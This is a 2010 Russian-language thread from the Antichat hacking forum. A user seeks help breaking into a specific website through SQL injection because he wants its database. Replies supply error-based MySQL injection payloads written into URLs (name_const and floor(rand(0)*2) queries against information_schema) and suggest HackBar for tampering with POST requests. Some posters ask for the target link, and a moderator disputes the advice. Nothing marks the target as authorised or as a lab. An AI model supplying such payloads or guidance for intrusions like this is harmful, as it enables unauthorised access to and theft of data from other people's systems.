Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

31.05.2010, 04:01
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 311
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 327
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/includes/functions.php on line 343
Warning: Cannot modify header information - headers already sent by (output started at /home/site/www/public_html/includes/functions.php:311) in /home/site/www/public_html/search.php on line 12
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
|
|
|

31.05.2010, 05:40
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
Сообщение от DrakonSerg
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Судя по описанию, уязвимость в POST запросе а не GET, это только спец плагином можно подделать, например HackBar для FireFox.
А вот ошибочка далеко не означает SQL, это просто ошибка мускула, и не обязательно что там SQL есть.
|
|
|

31.05.2010, 06:20
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от Nightmarе
Судя по описанию, уязвимость в POST запросе а не GET, это только спец плагином можно подделать, например HackBar для FireFox.
А вот ошибочка далеко не означает SQL, это просто ошибка мускула, и не обязательно что там SQL есть.
o_O
А само поле для поиска не?
|
|
|

31.05.2010, 06:25
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме: 315861
Репутация:
5
|
|
Сообщение от DrakonSerg
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем:
как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
Модифицирую запрос разными способами. например в поля поиска введи or id= и так далее - дерзай 
|
|
|

31.05.2010, 08:30
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
замучился уже с этим сайтом. Сижу уже за ним часов 12 (
Нашел наконец то ошибку, которую можно вызвать через GET запрос
hxxp://site.com/gallery.php?file=1'
получаем на странице, кроме прочего контента (img всякие там):
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку?
SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP
Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею.
Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( )
ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
|
|
|

31.05.2010, 08:35
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
ну крути как слепую можешь использовать метод floor(rand(0))
|
|
|

31.05.2010, 08:36
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
hxxp://site.com/gallery.php?file=(select*from(select+name_const(ve rsion(),1),name_const(version(),1))a)
|
|
|

31.05.2010, 08:41
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Сообщение от LokbatanLi
hxxp://site.com/gallery.php?file=(select+from(select+name_const(ve rsion(),1),name_const(version(),1))a)
Я чесно сказать не понял, что ты хотел этим запросом добиться, но без изменени (что с параметром, что без)
ну крути как слепую можешь использовать метод floor(rand(0))
можно поподробней? Я вообще не представляю, с чего начать крутить ее.
|
|
|

31.05.2010, 08:57
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+coun t(0),concat((select+version()),floor(rand(0)*2))+f rom+information_schema.tables+group+by+2)a)
лучше ссылку в студию если конечно сайт не в .ru зоне
|
|
|

31.05.2010, 09:15
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от DrakonSerg
замучился уже с этим сайтом. Сижу уже за ним часов 12 (
Нашел наконец то ошибку, которую можно вызвать через GET запрос
hxxp://site.com/gallery.php?file=1'
получаем на странице, кроме прочего контента (img всякие там):
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку?
SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP
Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею.
Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( )
ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
Хочеться взять и ...
Если ошибка есть, то может быть и слепая (О чудо, я открыл глаза на мир скулей? ).
Ты бы лучше выложил ссылку.
Сообщение от LokbatanLi
hxxp://site.com/gallery.php?file=(select*from(select+name_const(ve rsion(),1),name_const(version(),1))a)
Ты вообще адекватный человек?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35
Если ошибка PHP, ошибки Sql синтаксиса нету, причём здесь твой вывод через ошибку?
Сообщение от pinch
hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+coun t(0),concat((select+version()),floor(rand(0)*2))+f rom+information_schema.tables+group+by+2)a)
лучше ссылку в студию если конечно сайт не в .ru зоне
Аналогично.
// Будь тут Grey, он бы вам таких клизм вставил, что вы бы больше сюда незаходили
2pinch, ну раз непомешан, чего советовать тогда?
Последний раз редактировалось Ctacok; 31.05.2010 в 09:34..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|